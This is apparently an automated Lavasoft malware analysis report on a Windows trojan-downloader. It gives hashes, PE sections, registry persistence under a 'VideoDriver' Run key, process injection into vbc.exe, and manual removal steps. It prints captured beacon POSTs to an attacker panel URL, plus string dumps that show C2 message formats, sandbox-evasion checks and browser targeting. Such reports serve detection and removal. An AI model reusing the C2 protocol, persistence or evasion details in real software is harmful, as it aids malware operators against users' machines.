HEUR:Trojan.Win32.Generic (Kaspersky), TrojanLoadMoney.YR, TrojanDownloaderVundo.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: edf2199994d1a0ef2730391774b0574f
SHA1: b8da3f1c4df1b32e1a973fd2fe7b965a1ea19d9a
SHA256: 1b059fab27aa0661a8336e136fead7ba5115a5178e7f73f186240131683a44ef
SSDeep: 3072:dBWg0WcuUvpEZ/Tqqz47VJ0LrkGODhl/0UrVWCk/EBR8imt:XWg8AT7uJUrxK8N8BaV
Size: 153600 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2015-02-18 23:14:39
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
vbc.exe:504
%original file name%.exe:580
Mutexes
The following mutexes were created/opened:
ShimCacheMutex
File activity
The process vbc.exe:504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\config\software (326 bytes)
%System%\config\SOFTWARE.LOG (1315 bytes)
The Trojan deletes the following file(s):
%WinDir%\1418334051\lsass (0 bytes)
The process %original file name%.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe (153 bytes)
Registry activity
The process vbc.exe:504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 15 D5 47 EE D9 7D 16 93 8E BB 89 56 D7 FA 6B"
The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"*1418334051"
The process %original file name%.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 95 A7 72 0B 01 21 FF C6 1D EC FB 88 94 38 44"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"VideoDriver" = "%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe"
Dropped PE files
MD5 | File path |
---|---|
67f5238229333c061092f5a32e8c2ee1 | c:\WINDOWS\1418334051\lsass |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\config\software (326 bytes)
%System%\config\SOFTWARE.LOG (1315 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe (153 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"VideoDriver" = "%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: dge
Product Version: 1.0.0.0
Legal Copyright: Copyright (c)
Legal Trademarks:
Original Filename: dge3.exe
Internal Name: dge3.exe
File Version: 1.0.0.0
File Description: dge
Comments:
Language: English
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 150612 | 151040 | 5.42786 | 270f60416938301061a7d215a3dac394 |
.rsrc | 163840 | 1296 | 1536 | 2.64395 | 4a52917006d4306a7fe177d678015a9f |
.reloc | 172032 | 12 | 512 | 0.070639 | 79737747aaf2d243a456ab7612074458 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://hacka4life.atwebpages.com/panel/gate.php | 83.125.22.211 |
hxxp://hacka4life.atwebpages.com:80/panel/gate.php | 83.125.22.211 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /panel/gate.php HTTP/1.1
Host: hacka4life.atwebpages.com:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 436
a=dnNwbW5raGlmY2RheHVnYnl0cW9sd3JqZXo6d3Rxcm9saWpnZGVieXp1cG1raGN4ZmFzbnY=&b=gHR5dGU6drVfZWF0gHVqZDcyMTisMDRsMDd3NDU0MTEyZTJiODFiOGQ4MDZlNsE3MsY5NrZ8drFkOsQmgGJaX2kqpGyxZDcfgGJaX2ZqpGVvOsB8Yrkgb2V5dvcfgGJ1d3l6ZrFtd2V8&c=vvsspqqnnroolllijjggddeb
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2015 03:10:50 GMT
Server: Apache
Content-Length: 60
Connection: close
Con
POST /panel/gate.php HTTP/1.1
Host: hacka4life.atwebpages.com:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 468
a=bGlmZ2RlYnl6d3Rxcm9tanh1c3BraGNuYXY6dnNwbW5raGlmY3pheHVxbGdkeXRvYmV3cmo=&b=pHR5eGU6h25pZXbvY3g1rWQ6MTE4YfA0YfA3NfQ1NDEgMWUiYTmgYTboODA2ZDYgNfI2OTZqpHBirXY6YWRzrW58YXJlrDt4ODZ8Z2VdZDtoZXNxnG9cpGNjeqVfOlF8h3M6V19YUHg2ZXI6nlEdMC44pG5vnDu0LlB8hqV3OlF8&c=ebcczzzwxuuurrsopmmmjjkh
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2015 03:10:44 GMT
Server: Apache
Content-Length: 60
Connection: close
Content-Type: text/html
ZWJjY3p6end4dXV1cnJzb3BtbW1qamtoZonynWRHVwvohUZfUFRxn2ZBPT0K..
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
vbc.exe_504:
.text
P`.data
.rdata
`@.eh_fram
0@.bss
.idata
tL
HpiGjC6poKKJFMdfmGQsI5uhj5PYLApwet655VSJtkKTpLJWQLjgArOIiQDm28YYthWGtuayR4eZdfbrLyhq8D0UW0J2jCW5L9ItMESBTdxNTFZvmvbcjuLIJTv7LA`yIuD5xYRbIB4uh-zy8lbX3u89aj`cNtNFIAxz7CPRvcgwG0tXtQ1oeVIauFRAKSQw33HBdvlLejtdr8Ma6iDVI4k8DuX96QaneKsAXqZbwp9bfKOYBewACUkYehN-UqEQS8U`eIBgqzAqrAq3yL0KjcWCXQQ`H02f18kAybb8cwpgOSp2fwN2ZVVILcKR7HTiDPJ`y5w737tO5yOOL5x973TBmhBcKp2g8o`ehq1H7saiz`LzvH6Igkk8IHryAUP2UDQxfn0UMJva03Dr57Hs9uF53WabeNUKwAqG99HKheyyVtSu7sk0qflEJ4t5`H2IB141j4cyQsYNXn`uiBzX9Osqjxz1JsjwJ-vqOUgZJSzqyNUotPGHRPPtirMjag1xWO`ZqqtTeRq`Du1yH2Jj2XMftJWwf8nqrquwISsKatl4wy2eX2Box2yuco7Rr9QDuVLq5Lk3IP4jc2fN00Gd9soS9GKZzMOhcm7QWC9r4xTYcWQ8BZqW6Nn6QGTBmK`SoQfngRpTUt6hIF4Ng50MutuMmPxxB`Nm3UJhCIwtG4Yk4dubO`f4TawJnaIXTdiujiyeVLzW`r2leprFV3hLO0uyF-qSzU-XOzpISf6Wkc5qSW19tBEJRERYgmgbBf`WaFUaDVTN-TaiERrEvCFGix6Q22f1AXYHRRwUmh008OwwreMb0jVXNUXOcn8cvs5hr3ksBVL0uRTUbuhA7xB5621lFVc22G1pvm1-DAsozM4V3FsCg6r-eA-nGP6TiIq84AJ1KR0c4fVlNBNripOtJHcyaAaU3ftPrqqNwiWRtRTHmA06i9nYlLfArr0zbNwi9x4DlE9wtymaUaIdJ-HBp5dYV8403MWRv4eC242xo7sd2gfijFnF4N346wDE9VkmnuKNFfV79BdoOEJvM4vtDW8TzYnD`PoOtAAQIESdcwVht`5L8T`SekbkknK`0MMX`be89njHcj7lxG5OT`iz`Wy`7zl0XVA1Y6litBLu9o9CEWkMQd4sObxbHkI6bT5gfWQ6GW65uvOMiaqEZZLmD`c6hSzqLg`YX1nTI4nqEL9K4fF-Xj0rRjv7bEVhIAP3`9x-tz4lfzM~
libgcj-13.dll
Mozilla/4.0 (compatible)
%s--%s
%s\B%i.tmp
http.
hXXp://
hXXps://
%y%m%d
%s:%i
%s\browser%li.html
%s "%s"
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
%s\%s.exe
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
NoWindowsUpdate
%s@%s
%s\I%li.bat
%s\U%li.bat
%s\Google\Chrome\Application\chrome.exe
%s\Internet Explorer\iexplore.exe
%s\Opera\opera.exe
%s\Mozilla Firefox\firefox.exe
%s\Maxthon3\Bin\Maxthon.exe
Google Chrome
Opera
Firefox
chrome.exe
opera.exe
firefox.exe
iexplore.exe
Maxthon.exe
%s(%s)
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
%s%s%i%s%s%s%s%s
%s:%s
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
autoruns.exe
explorer.exe
SbieDll.dll
snxhk.dll
dbghelp.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
76487-640-1457236-23837
76487-644-3177037-23510
55274-640-2673064-23950
76497-640-6308873-23835
Windows Task Manager
%s %i %i
.hidden
filesearch.stop
%s@%s:%i
%s\System32\drivers\etc\protocol
%s\Microsoft.NET\Framework\
v4.0.30319
v2.0.50727
\explorer.exe
HTTP/1.
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
application/x-www-form-urlencoded
HTTP/1.
dnsapi.dll
%s & %s
Software\Microsoft\Windows\CurrentVersion\
\Microsoft\Windows
%s%s%s%s%i%s%s
:Zone.Identifier
%s\K%li.bat
document.write(unescape('%s'));
operator
operator
global constructors keyed to
global destructors keyed to
operator""
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
fc_key
use_fc_key
hXXp://hacka4life.atwebpages.com/panel/gate.php
v1.0.8
panel/gate.php
hacka4life.atwebpages.com
%WinDir%
%Program Files%
%Documents and Settings%\All Users
%Documents and Settings%\%current user%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Opera\opera.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
e.exe
ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8
%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe
%WinDir%\1418334051
%WinDir%\1418334051\lsass
RegCloseKey
RegCreateKeyExA
RegFlushKey
RegOpenKeyExA
GetProcessHeap
ShellExecuteA
InternetOpenUrlA
ADVAPI32.DLL
KERNEL32.DLL
msvcrt.dll
SHELL32.DLL
USER32.dll
WININET.DLL
Okernel32.dll
advapi32.dll
Aicmp.dll
surlmon.dll
gws2_32.dll
rpcrt4.dll
vbc.exe_504_rwx_00400000_00083000:
.text
P`.data
.rdata
`@.eh_fram
0@.bss
.idata
tL
HpiGjC6poKKJFMdfmGQsI5uhj5PYLApwet655VSJtkKTpLJWQLjgArOIiQDm28YYthWGtuayR4eZdfbrLyhq8D0UW0J2jCW5L9ItMESBTdxNTFZvmvbcjuLIJTv7LA`yIuD5xYRbIB4uh-zy8lbX3u89aj`cNtNFIAxz7CPRvcgwG0tXtQ1oeVIauFRAKSQw33HBdvlLejtdr8Ma6iDVI4k8DuX96QaneKsAXqZbwp9bfKOYBewACUkYehN-UqEQS8U`eIBgqzAqrAq3yL0KjcWCXQQ`H02f18kAybb8cwpgOSp2fwN2ZVVILcKR7HTiDPJ`y5w737tO5yOOL5x973TBmhBcKp2g8o`ehq1H7saiz`LzvH6Igkk8IHryAUP2UDQxfn0UMJva03Dr57Hs9uF53WabeNUKwAqG99HKheyyVtSu7sk0qflEJ4t5`H2IB141j4cyQsYNXn`uiBzX9Osqjxz1JsjwJ-vqOUgZJSzqyNUotPGHRPPtirMjag1xWO`ZqqtTeRq`Du1yH2Jj2XMftJWwf8nqrquwISsKatl4wy2eX2Box2yuco7Rr9QDuVLq5Lk3IP4jc2fN00Gd9soS9GKZzMOhcm7QWC9r4xTYcWQ8BZqW6Nn6QGTBmK`SoQfngRpTUt6hIF4Ng50MutuMmPxxB`Nm3UJhCIwtG4Yk4dubO`f4TawJnaIXTdiujiyeVLzW`r2leprFV3hLO0uyF-qSzU-XOzpISf6Wkc5qSW19tBEJRERYgmgbBf`WaFUaDVTN-TaiERrEvCFGix6Q22f1AXYHRRwUmh008OwwreMb0jVXNUXOcn8cvs5hr3ksBVL0uRTUbuhA7xB5621lFVc22G1pvm1-DAsozM4V3FsCg6r-eA-nGP6TiIq84AJ1KR0c4fVlNBNripOtJHcyaAaU3ftPrqqNwiWRtRTHmA06i9nYlLfArr0zbNwi9x4DlE9wtymaUaIdJ-HBp5dYV8403MWRv4eC242xo7sd2gfijFnF4N346wDE9VkmnuKNFfV79BdoOEJvM4vtDW8TzYnD`PoOtAAQIESdcwVht`5L8T`SekbkknK`0MMX`be89njHcj7lxG5OT`iz`Wy`7zl0XVA1Y6litBLu9o9CEWkMQd4sObxbHkI6bT5gfWQ6GW65uvOMiaqEZZLmD`c6hSzqLg`YX1nTI4nqEL9K4fF-Xj0rRjv7bEVhIAP3`9x-tz4lfzM~
libgcj-13.dll
Mozilla/4.0 (compatible)
%s--%s
%s\B%i.tmp
http.
hXXp://
hXXps://
%y%m%d
%s:%i
%s\browser%li.html
%s "%s"
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
%s\%s.exe
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
NoWindowsUpdate
%s@%s
%s\I%li.bat
%s\U%li.bat
%s\Google\Chrome\Application\chrome.exe
%s\Internet Explorer\iexplore.exe
%s\Opera\opera.exe
%s\Mozilla Firefox\firefox.exe
%s\Maxthon3\Bin\Maxthon.exe
Google Chrome
Opera
Firefox
chrome.exe
opera.exe
firefox.exe
iexplore.exe
Maxthon.exe
%s(%s)
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
%s%s%i%s%s%s%s%s
%s:%s
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
autoruns.exe
explorer.exe
SbieDll.dll
snxhk.dll
dbghelp.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
76487-640-1457236-23837
76487-644-3177037-23510
55274-640-2673064-23950
76497-640-6308873-23835
Windows Task Manager
%s %i %i
.hidden
filesearch.stop
%s@%s:%i
%s\System32\drivers\etc\protocol
%s\Microsoft.NET\Framework\
v4.0.30319
v2.0.50727
\explorer.exe
HTTP/1.
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
application/x-www-form-urlencoded
HTTP/1.
dnsapi.dll
%s & %s
Software\Microsoft\Windows\CurrentVersion\
\Microsoft\Windows
%s%s%s%s%i%s%s
:Zone.Identifier
%s\K%li.bat
document.write(unescape('%s'));
operator
operator
global constructors keyed to
global destructors keyed to
operator""
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
fc_key
use_fc_key
hXXp://hacka4life.atwebpages.com/panel/gate.php
v1.0.8
panel/gate.php
hacka4life.atwebpages.com
%WinDir%
%Program Files%
%Documents and Settings%\All Users
%Documents and Settings%\%current user%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Opera\opera.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
e.exe
ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8
%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe
%WinDir%\1418334051
%WinDir%\1418334051\lsass
RegCloseKey
RegCreateKeyExA
RegFlushKey
RegOpenKeyExA
GetProcessHeap
ShellExecuteA
InternetOpenUrlA
ADVAPI32.DLL
KERNEL32.DLL
msvcrt.dll
SHELL32.DLL
USER32.dll
WININET.DLL
Okernel32.dll
advapi32.dll
Aicmp.dll
surlmon.dll
gws2_32.dll
rpcrt4.dll
%original file name%.exe_580_rwx_00CE0000_00001000:
..hx%